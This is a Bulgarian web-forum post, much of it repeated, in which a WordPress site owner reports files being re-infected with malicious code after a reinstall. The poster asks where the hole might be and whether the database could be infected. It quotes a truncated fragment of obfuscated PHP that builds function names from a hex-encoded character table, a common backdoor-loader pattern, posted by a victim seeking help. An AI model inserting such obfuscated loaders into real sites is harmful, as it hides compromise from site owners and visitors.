Здравейте!
От хостинга получих съобщение за зловреден код в някой файлове по сайта. Сайта не е спирал и нямаше видими проблеми. Изтрих го целия. Сложих нов WP и от стария взех само папка uploads и базата. След това сканираха сайта отново и всичко беше ОК, но 3 дни след това пак ми изпратиха съобщение за 10-тина заразени файлове! Във файловете има добавен много реда код. Ето част от него:
Може ли да ме посъветвате, къде да търся дупката? Може ли да има нещо в базата?
Приемам и предложения за платена помощ!
От хостинга получих съобщение за зловреден код в някой файлове по сайта. Сайта не е спирал и нямаше видими проблеми. Изтрих го целия. Сложих нов WP и от стария взех само папка uploads и базата. След това сканираха сайта отново и всичко беше ОК, но 3 дни след това пак ми изпратиха съобщение за 10-тина заразени файлове! Във файловете има добавен много реда код. Ето част от него:
Код:
<?php $w43347e3 = 668;$GLOBALS['v5a47'] = Array();global $v5a47;$v5a47 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['m5687ccb'] = "\x59\x2f\x6f\x4e\x9\x3a\x7c\x40\x25\x73\x6e\x79\x6c\x5e\x62\x32\x4a\x7d\x22\x28\x68\x3c\x39\x46\x2a\x34\x47\x3e\x43\x51\x37\x60\x3b\x58\x3d\x5c\x64\x71\x26\x41\x5d\x57\xa\x31\x6d\x55\x33\xd\x77\x78\x76\x27\x70\x5b\x2c\x44\x67\x74\x4d\x48\x65\x38\x21\x56\x3f\x50\x36\x49\x2e\x7a\x54\x75\x20\x5a\x69\x4b\x42\x7e\x23\x2b\x72\x4c\x29\x61\x45\x53\x6b\x7b\x52\x66\x30\x35\x6a\x63\x24\x5f\x2d\x4f";$v5a47[$v5a47['m5687ccb'][48].$v5a47['m5687ccb'][60].$v5a47['m5687ccb'][25].$v5a47['m5687cc...Може ли да ме посъветвате, къде да търся дупката? Може ли да има нещо в базата?
Приемам и предложения за платена помощ!
Последно редактирано:
